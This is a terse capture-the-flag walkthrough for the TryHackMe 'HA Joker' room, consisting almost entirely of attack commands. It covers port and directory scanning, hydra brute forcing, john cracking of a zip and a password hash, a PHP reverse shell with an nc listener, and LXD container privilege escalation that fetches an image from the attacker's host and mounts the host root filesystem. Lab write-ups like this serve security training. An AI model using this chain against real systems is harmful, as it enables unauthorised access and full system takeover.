HA Joker CTF

Room Link: https://tryhackme.com/room/jokerctf

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/8080 - HTTP

Kali

hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 -f $VICTIM http-get /

wasn't finding it but should have found a backup.zip

Kali

nikto -id joker:hannah -h $VICTIM:8080

Kali

zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt 
unzip backup.zip
Password: hannah

Kali

cd db
cat joomladb.sql | grep admin

Hash

$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG

Kali

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Browser

Username: admin
Password: abcd1234

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php

Kali

nc -lvnp 1234

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

id

Kali

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.

Victim

cd /tmp
wget http://$KALI:81/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

PreviousOh My WebServer NextOllie

Last updated 5 months ago